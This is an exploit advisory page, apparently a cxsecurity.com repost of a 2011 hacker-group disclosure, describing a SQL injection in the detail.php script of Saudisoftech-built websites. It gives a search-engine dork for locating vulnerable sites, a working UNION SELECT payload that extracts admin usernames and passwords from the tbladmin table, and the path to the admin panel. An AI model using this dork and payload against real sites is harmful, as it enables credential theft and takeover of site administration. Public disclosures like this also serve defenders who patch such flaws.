Saudisoftech detail.php SQLInjection Vulnerability

2011.04.25
Credit: Net.Edit0r
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#(+) Exploit Title: Saudisoftech detail.php SQLInjection Vulnerability #(+) Data : 2011-04-25 #(+) Author : Net.Edit0r #(+) DisCovered By: 3H34N #(+) E-mail : Black.hat.tm@gmail.com and Ehsan.Empire@Att.Net #(+) dork : "Designed By: SAUDI SOFTECH" id= #(+) Versian : All Ver #(+) Category : Web Apps [SQl] #(+) My Home : http://Security-War.com and http://Black-HG.com #(+) Platform : Tested on: linux #(+) Download : http://www.saudisoftech.com/ ____________________________________________________________________ Black Hat Group #BHG ____________________________________________________________________ The security problem in the file "detail.php" has been created. [+] Vulnerable File : # [+]http://localhost.com/detail.php?id=[SQL] [+] SQL injection Vulnerability # [+]http://localhost.com/detail.php?id=-47 union select usrname,password from tbladmin-- Note:login page is here http://localhost.com/panel ____________________________________________________________________ ____________________________________________________________________ ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & Amir_MaGic & D3adly #BHG (+)Sp My Best Friend : HUrr!c4nE ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ M4hd1 ~ Mikili ~ d3v1l.eyes ~ S3Ri0uS and all Friends (+)Gr33ts to : All Iranian HackerZ


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top